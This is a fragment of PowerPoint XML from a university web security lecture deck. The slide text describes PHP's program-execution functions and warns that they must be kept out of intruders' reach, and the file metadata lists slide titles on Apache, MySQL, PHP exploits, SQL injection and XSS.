              <a:t>an external program on the server that can fill an array with the different lines of output produced by program execution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>assthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>external programs in a way that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> but more suitable for the programs that produce binary data that is meant to be sent back to the browser </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>that works much </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> function in Perl </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hell-exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>works in the same way as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>backticks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>operator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>in Perl </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean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/>
              <a:t>Since these functions execute programs on the server, they must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>kept outside the reach of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>intruders 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b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRP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883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10446</TotalTime>
  <Words>3792</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>490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Default Design</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Install Apache, PHP5, &amp; MySQL</vt:lpstr>
      <vt:lpstr>Install and Configure Apache2 (1)</vt:lpstr>
      <vt:lpstr>Install and Configure Apache2 (2)</vt:lpstr>
      <vt:lpstr>Install and Configure Apache2 (3)</vt:lpstr>
      <vt:lpstr>Install and Configure Apache2 (4)</vt:lpstr>
      <vt:lpstr>Introduction to PHP</vt:lpstr>
      <vt:lpstr>PHP’s System Program Execution Function</vt:lpstr>
      <vt:lpstr>Sample PHP Exploit</vt:lpstr>
      <vt:lpstr>PHP Exploit to Spew out Spam (1)</vt:lpstr>
      <vt:lpstr>PHP Exploit to Spew out Spam (2)</vt:lpstr>
      <vt:lpstr>PHP5 Installation</vt:lpstr>
      <vt:lpstr>Spam File</vt:lpstr>
      <vt:lpstr>Uploaded Web Page</vt:lpstr>
      <vt:lpstr>Upload Page</vt:lpstr>
      <vt:lpstr>MySQL with Row-Level Security</vt:lpstr>
      <vt:lpstr>MySQL with Row-Level Security</vt:lpstr>
      <vt:lpstr>MySQL Installation (1)</vt:lpstr>
      <vt:lpstr>MySQL Installation (2)</vt:lpstr>
      <vt:lpstr>MySQL Installation (3)</vt:lpstr>
      <vt:lpstr>MySQL Installation (4)</vt:lpstr>
      <vt:lpstr>MySQL Installation (5)</vt:lpstr>
      <vt:lpstr>MySQL Installation (6)</vt:lpstr>
      <vt:lpstr>MySQL Installation (7)</vt:lpstr>
      <vt:lpstr>MySQL Installation (8)</vt:lpstr>
      <vt:lpstr>Row-Level Security (1)</vt:lpstr>
      <vt:lpstr>Row-Level Security (2)</vt:lpstr>
      <vt:lpstr>PHP + MySQL</vt:lpstr>
      <vt:lpstr>SQL Injection Attack</vt:lpstr>
      <vt:lpstr>Cross-site Scripting (XSS) Attacks </vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>UD CIS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Unix System Overview</dc:title>
  <dc:creator>CHien-Chung Shen</dc:creator>
  <cp:lastModifiedBy>Chien-Chung Shen</cp:lastModifiedBy>
  <cp:revision>217</cp:revision>
  <cp:lastPrinted>2012-08-31T14:00:57Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-22T13:42:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-05T14:18:18Z</dcterms:modified>
</cp:coreProperties>
</file>